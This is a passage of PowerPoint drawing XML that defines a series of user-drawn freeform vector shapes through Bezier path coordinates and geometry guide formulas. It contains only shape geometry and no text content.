                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="182"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="185"/>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2"/>
                      <a:pt x="117" y="173"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="174"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="145"/>
                      <a:pt x="126" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="145"/>
                      <a:pt x="127" y="145"/>
                      <a:pt x="127" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="137"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="116"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="137"/>
                      <a:pt x="132" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="132"/>
                      <a:pt x="128" y="130"/>
                      <a:pt x="128" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="102"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="78"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="55"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="50"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="46"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="43"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="45"/>
                      <a:pt x="80" y="45"/>
                      <a:pt x="80" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="34"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="30"/>
                      <a:pt x="71" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="30"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="44"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="57"/>
                      <a:pt x="64" y="58"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="65"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="64"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="57"/>
                      <a:pt x="103" y="57"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="68"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="68"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="39"/>
                      <a:pt x="71" y="39"/>
                      <a:pt x="71" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="100" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="2978"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 1 h 3"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1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2" y="1"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="1"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>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Freeform 87"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="2978"/>
                <a:ext cx="4" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2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2"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Freeform 88"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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7"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Freeform 89"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="3657"/>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Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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6" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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7" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="3657"/>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96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30"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98"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="366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2" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="26"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="103"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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3" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="3663"/>
                <a:ext cx="77" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 240"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 240"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 240 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 240"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 240"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 42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4" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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6" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982"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8" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="3657"/>
                <a:ext cx="82"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Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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0" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477"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3"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Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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2" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="3657"/>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3" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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4" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="636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Freeform 113"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="655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7" name="Freeform 114"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="675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8" name="Freeform 115"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897"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2" y="26"/>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Freeform 116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="3663"/>
                <a:ext cx="78"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2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Freeform 117"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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Freeform 118"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311"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Freeform 119"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509"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Freeform 120"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657"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Freeform 121"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="3650"/>
                <a:ext cx="218" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 83 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 27 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 128 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 186 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160 w 179"/>
                  <a:gd name="T41" fmla="*/ 153 h 209"/>
                  <a:gd name="T42" fmla="*/ 88 w 179"/>
                  <a:gd name="T43" fmla="*/ 72 h 209"/>
                  <a:gd name="T44" fmla="*/ 101 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79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8 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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1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5"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
